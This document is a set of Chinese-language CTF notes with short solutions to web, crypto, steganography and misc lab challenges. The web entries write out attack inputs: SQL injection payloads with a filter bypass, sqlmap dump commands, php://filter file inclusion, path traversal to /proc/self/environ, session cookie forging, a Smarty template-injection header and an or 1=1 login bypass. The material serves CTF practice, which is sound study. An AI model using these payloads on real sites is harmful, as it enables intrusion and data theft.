我不说你怎么会知道是这篇文章

# CTF笔记
# **WEB-签到题**
F12查看源代码
# **密码学-密码学签到题**
文本反转
# **密码学-邮件编码**
Quoted-Printable解密http://www.metools.info/code/quotedprintable231.html
# **密码学-Unicode编码**
**Unicode解密**http://www.atoolbox.net/Tool.php?Id=670
# **隐写-娃哈哈**
1、下载图片
2、文本打开图片拉到底端找到flag
# **密码学-**风中密语
百家姓解密http://www.atoolbox.net/Tool.php?Id=1050
# **密码学-佛前顿悟**
与佛论禅加密http://www.atoolbox.net/Tool.php?Id=1027
# **密码学-事不过三**
Base64解密三次https://tool.chinaz.com/tools/base64.aspx
# WEB-**文件包含**
教学文件中有
`file=php://filter/read=convert.base64-encode/resource=xxx.php`构造语句
# 隐写-猜一猜
百度百科宋茜英文名
# WEB-SQL盲注1
https://blog.csdn.net/qq_48511129/article/details/113180080?ydreferer=aHR0cHM6Ly9wYXNzcG9ydC5jc2RuLm5ldC9sb2dpbj9jb2RlPWFwcGxldHM%3D
1、改Header:index.php?file=php://filter/read=convert.[base64](https://so.csdn.net/so/search?q=base64&spm=1001.2101.3001.7020)-encode/resource=index.php
SQLmap
1、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" --current-db 查看数据库名
2、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" -D note –tables 查看数据库表
3、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" -D note -T fl4g –columns 查看表字段
4、python sqlmap.py -u"靶机URL” -D note -T f14g -C fllllag -dump 获取字段值
# WEB-SQL盲注2
https://www.cnblogs.com/zhengna/p/15931584.html
Burp suit
POST情况下
1、尝试获取当前数据库的库名
`name=xxx' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&pass=xxx`
2、获取表名
`name=xxx' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`
报错说明我们的sql语句被进行了某种替换,导致语法错误。尝试双写绕过(不明白为啥第一次没报错?)
`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`
3.获取字段名
`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),0x7e),1)--+&pass=xxx`
4、获取flag
`name=xxx' and updatexml(1,concat(0x7e,(selselectect flag from fl4g),0x7e),1)--+&pass=xxx`
5、长度过长,使用Right()等字符串函数处理获取Flag
# **WEB-任意文件读取2**
https://blog.csdn.net/CyhDl666/article/details/114829646
1、构造article?name=../../../proc/self/cwd/key.py查看key
2、使用flask_session_cookie_manager3加密key值
3、使用Burp Suit抓包Post,并修改Session值请求获取Flag
# **WEB-简单题**
https://blog.csdn.net/weixin_63957412/article/details/122952766
1、修改go.php为Index.PHP
2、在F12的监控中查看Index.php的信息,或者使用Burp Suit抓包Index.PHP获得Flag
# **WEB-找到FLAG**
https://blog.csdn.net/qq_54786552/article/details/118732644
https://blog.csdn.net/qq_53689523/article/details/128900366
1、构造?file=php:*//filter/read=convert.base64-encode/resource=flag.php*
2、获取key使用Base64解码
https://tool.chinaz.com/tools/base64.aspx
3、获得Flag
# **MISC-雾里看花**
1、下载ZIP解压
2、使用010Editor查看解压的word文件,发现文件头是压缩包
3、把word改成ZIP解压
4、打开文件夹逐个文件用文本打开找Flag
# 隐写-看图找旗
1、010Editor打开发现图片文件后有压缩包
2、拿出来解压得到TXT,Base64解码获得key:f{ysrolye_yoau_v_lge13c}
https://tool.chinaz.com/tools/base64.aspx
3、跳格子获得flag
# **WEB-弱机网站**
https://blog.csdn.net/hivjianxian/article/details/127991459
关键词:目录穿透漏洞
1、URL直接访问/img..
# **(藏宝题)MISC-伪加密**
https://blog.csdn.net/xiaozhaidada/article/details/124538768
关键词:伪加密
1、下载压缩包
2、用010editor打开后修改50 4B 03 04 14 00,50 4B 01 02 1F 00 14 00两处后全局参数09 00至00 00
# **WEB-层层推进**
1、F12查看源码,有一个SO的html,无限往下点到404.tml,获得Flag
# **隐写-抽丝剥茧**
1、用010editor打开图片,发现有一个图片和一个压缩包,删掉图片部分改后缀为zip
2、用文本打开原来的图片部分,发现有key,用Unicode解密后获得密码
3、打开压缩包获得flag
# **隐写-穷图末路**
1、010打开图片,发现后面有一串地址,从data:开始全部复制下来,浏览器输入访问
# **MISC-ROT13**
1、Base64解密
2、rot13解密
# **MISC-键盘钩子hook**
聪明的自己翻译
笨的(但直接方便,主要是还要看英文意思):
1、打开vim编辑界面
2、根据指令操作一遍
# **(藏宝题) 秘密藏在我家的金库里**
关键词:二次注入
https://mp.weixin.qq.com/s/iHbj-En5xTcKf-NDyVLZbQ
1、通过dirsearchj进行目录爆破发现register.php
2、注册账号1232@qq.com;test;test登录,用户名显示在登录后的页面上。
3、这样这里有可能存在二次注入,当我们注册时,后台的SQL语句大概类似于
Insert into users (email,username,password) VALUES ([1232@qq.com](mailto:1232@qq.com),test,test)
4、使用代码爆破
# **(藏宝题) 名侦探很难**
1、直接输入admin,password登入
2、F12修改cookie的normal_user为admin_user
# **隐写-变形金刚**
1、下载图片,使用010Editor打开发现高度有问题
2、修改高度为03 20,查看图片下方出现二维码
3、扫码获得Flag
# **密码学-共模攻击**
https://blog.csdn.net/shuaicenglou3032/article/details/117934550
关键词:RSA原理 ****CommonModulus(英文都不会搜啊)****
1、看代码找原理,找公因数
2、python写反向代码处理,不行可循环爆破
# **密码学-未知文明的秘密**
# **web-前端加密**
1、控制台直接运行指定函数获取密码
2、通过密码登入获取Flag
# **MISC-拦截日志**
https://blog.csdn.net/zippo1234/article/details/109376357
https://ctftime.org/writeup/15211
# **(藏宝题)PPC编程-好玩的密钥**
# **爱的信号(6月10日藏宝题)**
# **火星来电(CRYPTO2)**
关键词:AAencode
1、AAencode解密
# **变形记(STEGA4)**
1、用010editor打开图片,发现有一个图片一个压缩包,将文件分离
2、修改图片高度看到压缩包密码
3、打开压缩包获取flag
# **邮件解密(STEGA2)**
1、010打开文件,发现文件头是504b0304,binwalk分析后看到该文件就是个压缩包
2、文件后缀改为zip,发现要密码
3、文件尾是密码解压出pic.txt,data开始复制进浏览器即可,二维码扫出来就是flag
# **爱情甜如蜜(Web5)**
https://blog.csdn.net/qq_46263951/article/details/119703207
[https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142^v88^insert_down1,239^v2^insert_chatgpt&utm_term=ctf the honey shop&spm=1018.2226.3001.4187](https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142%5Ev88%5Einsert_down1,239%5Ev2%5Einsert_chatgpt&utm_term=ctf%20the%20honey%20shop&spm=1018.2226.3001.4187)
1、Burp suit抓包下载图片,读取构造../../../../../../../proc/self/environ获得SECRET_KEY=Nllt8SF3wxTkry3MDNYl0aGOtgJWu8YyvsakTKIc‘
2、通过flask-session-cookie-manager加密SECRET_KEY获得Session:eyJiYWxhbmNlIjo5OTk5OX0.ZIg2Pw.C-n5B2COZMP0OD4z7qsabUTmf2o
3、F12修改网站Session余额变为9999,购买Flag商品获得Flag
# **你说什么就是什么咯(Web1)**
https://blog.csdn.net/qq_53106085/article/details/120807244
关键词:伪造XFF
1、抓包靶机
2、添加Referer: https://www.sgmw.com.cn/
# **障眼法(STEGA1)**
1、010editor打开图片,看到有CRC报错,爆破CRC码获得初始宽高
2、修改高度获得Flag
# **百密一疏(Web4)**
关键词:XML外部实体攻击,XML文件格式
本质:把`php://filter/convert.base64-encode/resource=/../flag.txt通过XML传输获取Flag`
1、构造XML文件
[x16.xml](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3ace1085-2780-40ce-8e95-5925934382d7/x16.xml)
2、上传文件获得key
3、Base64解码
# **跳板机(Web6)**
https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165450595316781683923987%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165450595316781683923987&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-121490787-null-null.142
# **蛛丝马迹(Web3)**
1、Burp suit抓包get,在Response中获得Flag
# **保护好你的API(Web02)**
关键词:****SmartySSTi,SSTi****
https://www.freebuf.com/articles/web/264615.html
1、url+/xff
2、payload:X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if}
# **脆弱的网站**
https://zhuanlan.zhihu.com/p/78989602
# **我爱数学**
https://www.cnblogs.com/20175211lyz/p/11588219.html
# **我命由我不由天(中)**
https://blog.csdn.net/weixin_43272781/article/details/94380078
# 谍影重重
关键词:万能密码,SQL注入
1、admin' or 1=1-- -
# 卷土重来
1、账号:admin,密码:sgmwctf
2、SQLmap爆破add_to_Car获得密码sglmap -u "靶机URL/add_to_cart" —data “product id=1” --method POST --tables
# 一千次的执着
(出题BUG,实际应该编写脚本请求1000次)
1、F12申请两次发现cookie有个参数变成2
2、抓包cookie有明显的失败请求参数,修改为1000发送请求返回Flag